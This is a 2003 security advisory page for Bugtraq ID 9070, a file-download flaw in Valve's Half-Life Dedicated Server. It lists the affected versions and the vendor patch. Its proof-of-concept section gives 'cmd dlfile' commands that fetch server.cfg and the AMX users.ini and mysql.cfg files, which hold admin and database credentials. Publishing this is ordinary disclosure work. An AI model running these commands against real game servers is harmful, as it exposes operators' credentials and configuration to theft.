Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

BID:9070

Info

Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

Bugtraq ID: 9070
Class: Access Validation Error
CVE:
Remote: Yes
Local: No
Published: Nov 19 2003 12:00AM
Updated: Mar 19 2015 08:49AM
Credit: Discovery of this vulnerability has been credited to 3APA3A <[email protected]>.
Vulnerable: Valve Software Half-Life Dedicated Server 4.1.1 .1c1 Win32
Valve Software Half-Life Dedicated Server 4.1.1 .0 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 4.1 .0.9 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 4.1 .0.8 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 4.1 .0.7 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 4.1 .0.6 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 4.1 .0.4 Win32
+ Valve Software Half-Life 1.1.1 .0
+ Valve Software Half-Life 1.1 .0.9
+ Valve Software Half-Life 1.1 .0.8
+ Valve Software Half-Life 1.1 .0.4 Windows
Valve Software Half-Life Dedicated Server 3.1.3
Valve Software Half-Life Dedicated Server 3.1.1 .1d Linux
Valve Software Half-Life Dedicated Server 3.1.1 .1c1 Linux
Valve Software Half-Life Dedicated Server 3.1.1 .0 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.9 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.8 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.7 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.6 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.5 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1 .0.4 Linux
+ Valve Software Half-Life 1.1 .0.4 Linux
Valve Software Half-Life Dedicated Server 3.1
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.3
- S.u.S.E. Linux 7.0
- Slackware Linux 7.1
Not Vulnerable: Valve Software Half-Life Dedicated Server 4.1.1 .1e Win32
Valve Software Half-Life Dedicated Server 4.1.1 .1e Linux
Valve Software Half-Life Dedicated Server 3.1.1 .1e Win32
Valve Software Half-Life Dedicated Server 3.1.1 .1e Linux

Discussion

Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

Half-Life dedicated server has been reported prone to an information disclosure vulnerability. This issue may also be exploited to deny service to legitimate users of the Half-Life dedicated server.

The issue presents itself due to a flaw in download functionality that is provided by the Half-Life dedicated server. It has been reported that a malicious attacker may exploit this functionality to download any file from the root folder of the current running game type, or from the valve folder.

Exploit / POC

Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

The following proof of concept has been supplied:
cmd dlfile server.cfg
cmd dlfile addons/amx/users.ini
cmd dlfile addons/amx/mysql.cfg
cmd dlfile maps/de_torn.bsp

Solution / Fix

Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

Solution:
It has been reported that an update has been released by Valve Software to address this issue. The update can be applied to the 4.1.1.1 series servers. This updated may be downloaded via ftp:

ftp.valvesoftware.com
Login: hlserver
Password: hlserver
Directory: x.1.1.1/Win32 or x.1.1.1/Linux


Valve Software Half-Life Dedicated Server 3.1 .0.9 Linux

Valve Software Half-Life Dedicated Server 3.1 .0.7 Linux

Valve Software Half-Life Dedicated Server 3.1

Valve Software Half-Life Dedicated Server 3.1 .0.5 Linux

Valve Software Half-Life Dedicated Server 3.1 .0.4 Linux

Valve Software Half-Life Dedicated Server 3.1 .0.6 Linux

Valve Software Half-Life Dedicated Server 3.1 .0.8 Linux

Valve Software Half-Life Dedicated Server 3.1.1 .0 Linux

Valve Software Half-Life Dedicated Server 3.1.1 .1c1 Linux

Valve Software Half-Life Dedicated Server 3.1.1 .1d Linux

Valve Software Half-Life Dedicated Server 4.1 .0.6 Win32

Valve Software Half-Life Dedicated Server 4.1 .0.9 Win32

Valve Software Half-Life Dedicated Server 4.1 .0.4 Win32

Valve Software Half-Life Dedicated Server 4.1 .0.7 Win32

Valve Software Half-Life Dedicated Server 4.1 .0.8 Win32

Valve Software Half-Life Dedicated Server 4.1.1 .1c1 Win32

Valve Software Half-Life Dedicated Server 4.1.1 .0 Win32

References

Valve Software Half-Life Dedicated Server Information Disclosure/DOS Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report